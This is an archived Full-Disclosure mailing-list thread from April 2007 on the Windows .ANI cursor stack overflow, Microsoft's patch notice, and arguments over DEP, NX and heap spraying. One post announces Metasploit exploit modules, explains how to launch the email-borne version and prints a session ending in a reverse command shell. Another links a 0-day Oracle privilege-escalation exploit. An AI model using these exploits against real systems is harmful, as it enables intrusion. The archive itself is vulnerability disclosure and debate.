In-Reply-To: <2ab70b460704011332pad5ebb9hc929cfffdd11b4e7@mail.gmail.com>
References: <969102.78862.qm@web63807.mail.re1.yahoo.com> <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com> <8a6b8e350704011140w429d3a8cn4d767726e6f571b@mail.gmail.com> <2ab70b460704011332pad5ebb9hc929cfffdd11b4e7@mail.gmail.com>
Message-ID:

On 4/1/07, Matti Ranta wrote:
>
> I don't know how to use vi what do i do

use vim :-P
From Larry at larryseltzer.com Mon Apr 2 03:30:38 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Sun, 1 Apr 2007 22:30:38 -0400
Subject: [Full-disclosure] MS Patch Coming Tuesday
Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD329@becca.LarrySeltzer.local>

http://www.microsoft.com/technet/security/bulletin/advance.mspx

Microsoft Security Bulletin Advance Notification
Updated: April 1, 2007

As part of the monthly security bulletin release cycle, Microsoft provides advance notification to our customers on the number of new security updates being released, the products affected, the aggregate maximum severity and information about detection tools relevant to the update. This is intended to help our customers plan for the deployment of these security updates more effectively.

In addition, to help customers prioritize monthly security updates with any non-security updates released on Microsoft Update, Windows Update, Windows Server Update Services and Software Update Services on the same day as the monthly security bulletins, we also provide:

* Information about the release of updated versions of the Microsoft Windows Malicious Software Removal Tool.

* Information about the release of NON-SECURITY, High Priority updates on Microsoft Update (MU), Windows Update (WU), Windows Server Update Services (WSUS) and Software Update Services (SUS).

Note that this information will pertain ONLY to updates on Microsoft Update, Windows Update, Windows Server Update Services and Software Update Services and only about High Priority, non-security updates being released on the same day as security updates. Information will NOT be provided about Non-security updates released on other days.

On Tuesday 3 April 2007 Microsoft is planning to release:

Security Updates

* One Microsoft Security Bulletin affecting Microsoft Windows.
The highest Maximum Severity rating for these is Critical. These updates will require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer.

Microsoft Windows Malicious Software Removal Tool

* Microsoft will not release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center on Tuesday 3 April 2007.

Non-security High Priority updates on MU, WU, WSUS and SUS

* Microsoft will not release any NON-SECURITY High-Priority Updates for Windows on Windows Update (WU) and Software Update Services (SUS) on Tuesday 3 April 2007.

* Microsoft will not release any NON-SECURITY High-Priority Updates on Microsoft Update (MU) and Windows Server Update Services (WSUS) on Tuesday 3 April 2007.

Although we do not anticipate any changes, the number of bulletins, products affected, restart information and severities are subject to change until released.

Microsoft will host a webcast next week to address customer questions on these bulletins. For more information on this webcast please see below:

* TechNet Webcast: Information about Microsoft's Security Bulletins

* Wednesday, 11 April 2007 11:00 AM (GMT-08:00) Pacific Time (US & Canada)

* http://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=1032327017&EventCategory=4&culture=en-US&CountryCode=US

At this time no additional information on these bulletins such as details regarding severity or details regarding the vulnerability will be made available until 3 April 2007.
From BlueBoar at thievco.com Mon Apr 2 04:24:17 2007
From: BlueBoar at thievco.com (Blue Boar)
Date: Sun, 01 Apr 2007 20:24:17 -0700
Subject: [Full-disclosure] [funsec] MS Patch Coming Tuesday
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD329@becca.LarrySeltzer.local>
References: <0273B67044957C41BD71D12EBA2E00AE0FD329@becca.LarrySeltzer.local>
Message-ID: <46107761.9040300@thievco.com>

http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-for-microsoft-security-advisory-935423.aspx

Larry Seltzer wrote:
> http://www.microsoft.com/technet/security/bulletin/advance.mspx
>
> Microsoft Security Bulletin Advance Notification
> Updated: April 1, 2007
>
> _______________________________________________
> Fun and Misc security discussion for OT posts.
> https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
> Note: funsec is a public and open mailing list.

From haroon at sensepost.com Mon Apr 2 05:21:08 2007
From: haroon at sensepost.com (Haroon Meer)
Date: Mon, 02 Apr 2007 06:21:08 +0200
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow -> Its ok, its in IE Protected Mode
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local>
Message-ID: <461084B4.6050201@sensepost.com>

Hi Larry..

Larry Seltzer wrote:
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode? You need to get the user to run the ANI outside
> of IE.

Assuming a compromised IE session is relatively harmless is pretty dangerous. While low-privileged browsing is a welcome idea, it is unfortunately (mostly) a solution to yesterday's problem. In the past we used to worry about zillions of machines being compromised and becoming zombies. Today, we are realizing more and more that it's all about the data.

ex: I run as mh on my machine. Everything of value on my machine is accessible to me. My music, my videos, my documents, my email, etc. Getting root/system on my machine gets you bragging rights, but if you were serious about hurting me, then mh is the only account you really need to compromise.

By default, IE uses a NoWriteUp policy.
Meaning that a low IL mh shell still gets to read everything of mh's by default (Check out Mark Minasi's chml to convert this to a more secure NoReadUp: http://www.minasi.com/vista/chml.htm)

A low integrity shell (as a result of an IE compromise) may not be able to write files to most locations on my machine, and so prevents my machine from being "owned" in the traditional sense, but won't stop me from losing all of my data.

/mh

--
Haroon Meer, SensePost Information Security
PGP: http://www.sensepost.com/pgp/haroon.txt
Tel: +27 83786 6637

From fdlist at digitaloffense.net Mon Apr 2 08:03:04 2007
From: fdlist at digitaloffense.net (H D Moore)
Date: Mon, 2 Apr 2007 02:03:04 -0500
Subject: [Full-disclosure] Metasploit vs ANI
Message-ID: <200704020203.04573.fdlist@digitaloffense.net>

Two new exploit modules are available for version 3.0 of the Metasploit Framework. These modules can be obtained by using the 'Online Update' feature in Windows and the 'svn update' command on Unix-like systems.

Matt Miller posted to the Metasploit Blog about our ANI efforts:
http://blog.metasploit.com/

The two exploits can be viewed in the svn repository at metasploit.com:
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb

The first module exploits the ANI flaw through Internet Explorer. It uses multiple icon files referenced from a single HTML page. This allows client-side brute forcing without resorting to JavaScript. This module will execute code on Windows 2000, Windows XP, and Windows Vista using the default target. As mentioned in the blog, a command shell is not directly accessible on Vista, but the Meterpreter payload can be used to bust out of the low-privileged process :-)

The second module exploits the ANI flaw through Outlook and Outlook Express.
It sends a multipart MIME e-mail that contains multiple icon files referenced from an HTML message. This allows brute forcing of the correct target via the mail reader, all without any form of client-side scripting. To use this module, point RHOST and RPORT at an SMTP server that will relay your email. Set the MAILFROM and MAILTO options, select a payload, launch the exploit, and wait for your payload to execute.

An example session from the e-mail based exploit module:

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Connecting to SMTP server localhost:20025...
[*] SMTP: 220 slug.metasploit.com ESMTP
[*] SMTP: 250-slug.metasploit.com 250-PIPELINING 250-8BITMIME 250-AUTH LOGIN PLAIN CRAM-MD5 250 SIZE 0
[*] SMTP: 250 ok
[*] SMTP: 250 ok
[*] Sending the message (404759 bytes)...
[*] SMTP: 354 go ahead
[*] SMTP: 250 ok 1175497222 qp 12648
[*] Closing the connection...
[*] SMTP: 221 slug.metasploit.com
[*] Waiting for a payload session (backgrounding)...
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >
[*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:37299)

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\program files\Outlook Express>

Enjoy!

- The Metasploit Staff

From george_ou at lanarchitect.net Mon Apr 2 08:29:13 2007
From: george_ou at lanarchitect.net (George Ou)
Date: Mon, 2 Apr 2007 00:29:13 -0700
Subject: [Full-disclosure] Metasploit vs ANI
In-Reply-To: <200704020203.04573.fdlist@digitaloffense.net>
References: <200704020203.04573.fdlist@digitaloffense.net>
Message-ID: <005801c774f8$9ec831e0$dc5895a0$@net>

HD,

I realize that DEP is disabled for Explorer and the browser by default, but I have it enabled and enforced by hardware XD/NX and it stopped the Milw0rm PoC.
Do you or anyone else have a PoC that can get around this type of fully-enabled hardware-enforced DEP?

I also realize that Protected Mode in IE7 does not prevent arbitrary code execution, but it does prevent that code from interacting with user or system files and it can't be persistent if that infected instance of IE7 is closed. From what I understand, owning the IE7 process in protected mode is bad in the sense that it lets you steal data from web pages or user input (such as password entry), but it doesn't let you capture keyboard input from other application or system processes.

Am I missing something here or does someone out there have a PoC that can get around these limitations?

George

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of H D Moore
Sent: Monday, April 02, 2007 12:03 AM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] Metasploit vs ANI

Two new exploit modules are available for version 3.0 of the Metasploit Framework. These modules can be obtained by using the 'Online Update' feature in Windows and the 'svn update' command on Unix-like systems.

From asotirov at determina.com Mon Apr 2 09:49:42 2007
From: asotirov at determina.com (Alexander Sotirov)
Date: Mon, 02 Apr 2007 01:49:42 -0700
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local>
Message-ID: <4610C3A6.1060901@determina.com>

Larry Seltzer wrote:
> Perhaps your exploit proves this wrong, but it's the last I heard on the
> subject. And even if there are only 256 slots how do you try more than
> one? Isn't the first wrong one going to crash the browser?

Read our advisory:
http://www.determina.com/security.research/vulnerabilities/ani-header.html

It explains that the vulnerable code is wrapped in an exception handler that recovers from access violations. That means that you can trigger the exploit multiple times and try different addresses, increasing the chance of hitting the right one (you only need 128 tries on average).

A much simpler solution is to use heap spraying (which works fine on Vista) for systems that don't have DEP enabled.

> As for the exploits in protected mode I'm sure there are things you can
> do, but it's a huge step down from what you can do in XP and it's gone
> as soon as you exit IE7

Unless somebody has a Vista exploit for the CSRSS kernel bug :-)

In general I agree that protected mode presents additional constraints on exploitation, but I would reserve judgment until we've seen a few more exploits and more public research.
Alex

From bunker at fastwebnet.it Mon Apr 2 11:33:12 2007
From: bunker at fastwebnet.it (Andrea "bunker" Purificato)
Date: Mon, 02 Apr 2007 12:33:12 +0200
Subject: [Full-disclosure] 0day Oracle 10g exploit - dbms_aq.enqueue - become DBA
Message-ID: <1175509992.7527.6.camel@fin>

[0-day] Remote Oracle DBMS_AQ.ENQUEUE exploit (10g)
Grant or revoke dba permission to unprivileged user

Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"

AUTHOR: Andrea "bunker" Purificato
http://rawlab.mindcreations.com

DATE: Mon Apr 2 11:54:22 CEST 2007

PATCH: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html
(CVE-2007-0268 ?)

You can find the evil code here:
http://rawlab.mindcreations.com/codes/exp/oracle/dbms_aq-enqueue.pl

Regards,

--
Andrea "bunker" Purificato
+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.
http://rawlab.mindcreations.com

From Thierry at Zoller.lu Mon Apr 2 14:56:35 2007
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Mon, 2 Apr 2007 15:56:35 +0200
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <4610C3A6.1060901@determina.com>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com>
Message-ID: <172274887.20070402155635@Zoller.lu>

Dear Alexander Sotirov,

AS> A much simpler solution is to use heap spraying (which works fine on Vista) for
AS> systems that don't have DEP enabled.

Are we talking Software DEP or Hardware enforced DEP?
--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7

From Larry at larryseltzer.com Mon Apr 2 15:06:21 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Mon, 2 Apr 2007 10:06:21 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <172274887.20070402155635@Zoller.lu>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local>

AS> A much simpler solution is to use heap spraying (which works fine on
AS> Vista) for systems that don't have DEP enabled.

TZ> Are we talking Software DEP or Hardware enforced DEP?

Heap spraying implies running code in the heap, which any DEP should block. There are all kinds of software techniques that would detect heap spraying. I'm sure any HIPS would block it. But like DEP they're not on in Windows by default.
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

From hailtheczar at gmail.com Mon Apr 2 15:12:39 2007
From: hailtheczar at gmail.com (Jason Areff)
Date: Mon, 2 Apr 2007 09:12:39 -0500
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local>
Message-ID:

On 4/2/07, Larry Seltzer wrote:
>
> AS> A much simpler solution is to use heap spraying (which works fine on
> AS> Vista) for systems that don't have DEP enabled.
> TZ> Are we talking Software DEP or Hardware enforced DEP?
>
> Heap spraying implies running code in the heap,

Actually, um.. no.. it doesn't

> which any DEP should block. There are all kinds of software techniques
> that would detect heap spraying. I'm sure any HIPS would block it.

Most likely not with regard to sotirov's new heap library stuff.

> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> larryseltzer at ziffdavis.com

How do you get to be in that position? Lots of buzzword-tossing I'd have to guess.
From Larry at larryseltzer.com Mon Apr 2 15:24:52 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Mon, 2 Apr 2007 10:24:52 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To:
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD336@becca.LarrySeltzer.local>

LS>Heap spraying implies running code in the heap,
JA>Actually, um.. no.. it doesn't

My understanding of heap spraying comes from http://blogs.securiteam.com/index.php/archives/638: "...SkyLined's heap spraying technique (http://sf-freedom.blogspot.com/2006/07/heap-spraying-internet-exploiter.html) (the concept of this technique is that you inject the nop + shellcode into the heap memory and use some method to trick the eip jump into that heap ..."

Sure sounds like running code in the heap to me.

JA>How do you get to be in that position? Lots of buzzword-tossing I'd have to guess.

Fuck you too.
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

From hailtheczar at gmail.com Mon Apr 2 15:26:58 2007
From: hailtheczar at gmail.com (Jason Areff)
Date: Mon, 2 Apr 2007 09:26:58 -0500
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD336@becca.LarrySeltzer.local>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD336@becca.LarrySeltzer.local>
Message-ID:

On 4/2/07, Larry Seltzer wrote:
>
> LS>Heap spraying implies running code in the heap,
> JA>Actually, um.. no.. it doesn't
>
> My understanding of heap spraying comes from
> http://blogs.securiteam.com/index.php/archives/638: "...SkyLined's heap
> spraying technique
> (http://sf-freedom.blogspot.com/2006/07/heap-spraying-internet-exploiter.html)
> (the concept of this technique is that you inject the nop +
> shellcode into the heap memory and use some method to trick the eip jump
> into that heap ..."
>
> Sure sounds like running code in the heap to me.

"Heap spraying" is filling the heap with controllable data... This is simply allocating things in the heap. NOT running code. You are trying to say that once you jump into that code via some exploit (NOT part of the heap spraying technique itself) THEN you are "running code in the heap".

> JA>How do you get to be in that position? Lots of buzzword-tossing I'd
> have to guess.
>
> Fuck you too.
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
>
> Contributing Editor, PC Magazine
> larryseltzer at ziffdavis.com
>

From Larry at larryseltzer.com Mon Apr 2 15:30:13 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Mon, 2 Apr 2007 10:30:13 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To:
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD336@becca.LarrySeltzer.local>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD337@becca.LarrySeltzer.local>

>>"Heap spraying" is filling the heap with controllable data... This is simply allocating things in the heap. NOT running code.
>>You are trying to say that once you jump into that code via some exploit (NOT part of the heap spraying technique itself) THEN you are "running code in the heap".

What's the point of spraying the heap if you're not going to jump into it?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com
From Thierry at Zoller.lu Mon Apr 2 15:32:20 2007
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Mon, 2 Apr 2007 16:32:20 +0200
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local>
Message-ID: <977664272.20070402163220@Zoller.lu>

Dear Larry Seltzer,

I did not ask to have an explanation about heap-based exploits.

LS> I'm sure any HIPS would block it. But like DEP they're not on
LS> in Windows by default.

That's where you are wrong, Larry. If you have an NX-capable CPU ("hardware enforced"), DEP is turned on by default on each and every process. Software DEP is not really DEP; it's more like SafeSEH...
--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7

From Larry at larryseltzer.com Mon Apr 2 15:53:21 2007
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Mon, 2 Apr 2007 10:53:21 -0400
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <977664272.20070402163220@Zoller.lu>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <977664272.20070402163220@Zoller.lu>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD33A@becca.LarrySeltzer.local>

>>That's where you are wrong larry, if you have an NX capable CPU ("hardware enforced") DEP is turned on by default on all and every process. Software DEP is not really DEP it's more like SafeSEH...

See http://support.microsoft.com/default.aspx/kb/875352 ("A detailed description of the Data Execution Prevention (DEP) feature in Windows XP Service Pack 2..."):

"OptIn - This setting is the default configuration. On systems with processors that can implement hardware-enforced DEP, DEP is enabled by default for limited system binaries and programs that "opt-in." With this option, only Windows system binaries are covered by DEP by default."

I'm almost positive that the limited system binaries do not include Internet Explorer. At the time they made this configuration decision, too many controls were broken by turning on DEP by default. And the policy is the same in Vista. For now.
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer at ziffdavis.com

From Thierry at Zoller.lu Mon Apr 2 16:06:39 2007
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Mon, 2 Apr 2007 17:06:39 +0200
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD33A@becca.LarrySeltzer.local>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <977664272.20070402163220@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD33A@becca.LarrySeltzer.local>
Message-ID: <432498141.20070402170639@Zoller.lu>

Dear Larry,

You are a stubborn guy, aren't you? _Again_, I am not talking about Software DEP but Hardware-enforced DEP. Read: 2 different things.

This is my last email in this regard. I see no point in trying to give you further information that might help you estimate risk, as you seem resistant to help or pointers beyond your comprehension or current belief.

You reference the correct page but then completely miss the point; please read the page entirely. Your pasted information relates to software DEP, not Hardware-enforced DEP (which is the NX bit).

Quote (wiki):

If the x86 processor supports this feature in hardware, then the NX features are turned on automatically in Windows XP/Server 2003 by default. If the feature is not supported by the x86 processor, then no protection is given. "Software DEP" is unrelated to the NX bit, and is what Microsoft calls their enforcement of Safe Structured Exception Handling.
Software DEP/SafeSEH simply checks when an exception is thrown to make sure that the exception is registered in a function table for the application, and requires the program to be built with it. This is likely a countermeasure to handle an exploit possible because of the way DEP handles NX faults; while most other technologies simply terminate the program unquestioningly, DEP raises an exception. It is not possible for a program to truly recover from an attack because program flow is destroyed in an unrecoverable manner.

On the very same MS page you reference:

Hardware-enforced DEP

Hardware-enforced DEP marks all memory locations in a process as non-executable unless the location explicitly contains executable code. A class of attacks exists that tries to insert and run code from non-executable memory locations. DEP helps prevent these attacks by intercepting them and raising an exception.

Hardware-enforced DEP relies on processor hardware to mark memory with an attribute that indicates that code should not be executed from that memory. DEP functions on a per-virtual memory page basis, and DEP typically changes a bit in the page table entry (PTE) to mark the memory page.

Processor architecture determines how DEP is implemented in hardware and how DEP marks the virtual memory page. However, processors that support hardware-enforced DEP can raise an exception when code is executed from a page that is marked with the appropriate attribute set.

Advanced Micro Devices (AMD) and Intel have defined and shipped Windows-compatible architectures that are compatible with DEP. Beginning with Windows XP SP2, the 32-bit version of Windows uses one of the following:
- The no-execute page-protection (NX) processor feature as defined by AMD.
- The Execute Disable Bit (XD) feature as defined by Intel.
List of CPUs with NX bit (courtesy of Wikipedia):
* AMD Athlon 64
* AMD Athlon 64 X2
* AMD Athlon 64 FX
* AMD Opteron
* AMD Sempron (from Paris onward)
* AMD Turion 64
* AMD Turion 64 X2
* Intel Celeron D
* Intel Celeron M (from the Dothan core onward)
* Intel Core Duo
* Intel Core Solo
* Intel Core 2 Duo
* Intel Core 2 Extreme
* Intel Pentium 4 (from Prescott F/J type onward)
* Intel Pentium D
* Intel Pentium Extreme Edition
* Intel Pentium M (from Dothan onward, newer models)
* Transmeta Efficeon
* VIA C7

That said, Michal Majchrowicz pointed out that return-to-libc style still works with DEP enabled, yes, but what about ASLR activated in Vista? Anyway, George already tested it; can somebody else confirm whether this is an issue or non-issue on Vista with NX-capable CPUs?

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7

From Thierry at Zoller.lu Mon Apr 2 16:44:46 2007
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Mon, 2 Apr 2007 17:44:46 +0200
Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
In-Reply-To: <3d3168e50704020813j4b19cbdds75851b90ce9ed0c3@mail.gmail.com>
References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <977664272.20070402163220@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD33A@becca.LarrySeltzer.local> <432498141.20070402170639@Zoller.lu> <3d3168e50704020813j4b19cbdds75851b90ce9ed0c3@mail.gmail.com>
Message-ID: <1310364043.20070402174446@Zoller.lu>

Dear Michal,

MM> Your claim is just pointless. You CAN write
MM> reliable exploit for Hardware NX DEP and you CAN take over whole system
MM> even in the IE Protected mode!!!!
Oh dear, my "claim is just pointless". The fact is, I have not made such a claim. I have introduced the notion of Hardware DEP and Software DEP; that's what I did and that's all. Some people don't realise there is a difference between them; I wanted to show them there is.

In other words, claiming it works with "DEP enabled" just because the PoC worked on your software-DEP-enabled machine doesn't prove it works on HW-enabled machines. That was my point. That's my entire point, not saying it can't be or isn't done with Hardware DEP... get it? I never claimed it can't be done; actually, within our company some do, so..

Try the current milworm PoCs on NX-enforced CPUs.

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7

From shawnmer at gmail.com Mon Apr 2 16:42:18 2007
From: shawnmer at gmail.com (Shawn Merdinger)
Date: Mon, 2 Apr 2007 09:42:18 -0600
Subject: [Full-disclosure] Cisco IP Phone vulnerability
In-Reply-To: <20070401030540.GA54469@infiltrated.net>
References: <20070401030540.GA54469@infiltrated.net>
Message-ID:

On 3/31/07, J. Oquendo wrote:
> -----BEGIN LSD SIGNED MESSAGE-----
>
> Infiltrated.net Security Advisory:
> Cisco IP Phone Denial of Service
> http://www.infiltrated.net/ciscoIPPhone7960.html
> Revision 6.9

Hi,

If I may suggest, there could be other "root causes" here. This report below is quite a read, both content and length, and is most certainly no joke. Though (in the waning spirit of April Fools' Day) I suppose a little fun can be had... for instance, the rationale for why maddox.xmission.com is not an acceptable home page for emergency relief worker laptops still eludes me. After all, it's "The Best Page in the Universe", is it not? Or, perhaps you've pondered what is the most "politically correct" manner for expeditiously dispatching crystal meth addicts coming down from their high in scenic Pearlington, Mississippi after hurricane Katrina? Read on, intrepid souls...
http://www.nps.navy.mil/DisasterRelief/docs/NPS-Katrina_AAR_LL.pdf

HASTILY FORMED NETWORKS FOR COMPLEX HUMANITARIAN DISASTERS
AFTER ACTION REPORT AND LESSONS LEARNED FROM THE NAVAL POSTGRADUATE SCHOOL'S RESPONSE TO HURRICANE KATRINA
1 - 30 September 2005
Authors
Brian Steckler (NPS Faculty)
Bryan L. Bradford, Maj, USAF (NPS Student)
Steve Urrea, Capt, USMC (NPS Student)

Typical Question: "Should we worry about VoIP phone security posture and resistance to real-world attack?"

